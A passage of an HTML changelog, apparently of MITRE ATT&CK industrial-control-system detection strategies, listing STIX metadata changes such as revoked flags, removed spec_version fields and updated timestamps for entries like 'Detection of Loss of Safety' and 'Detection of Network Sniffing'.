black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0779] Detection of Loss of Safety</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0763] Detection of Loss of View</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0773] Detection of Manipulate I/O Image</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0747] Detection of Manipulation of Control</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0785] Detection of Manipulation of View</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0725] Detection of Masquerading</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0777] Detection of Modify Alarm Settings</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0741] Detection of Modify Controller Tasking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0776] Detection of Modify Parameter</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0783] Detection of Modify Program</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0790] Detection of Module Firmware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0727] Detection of Monitor Process State</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0909] Detection of Multicast Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T20:46:31.212Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 20:46:31.212000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:30:28.263Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0753] Detection of Native API</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0770] Detection of Network Connection Enumeration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0800] Detection of Network Sniffing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 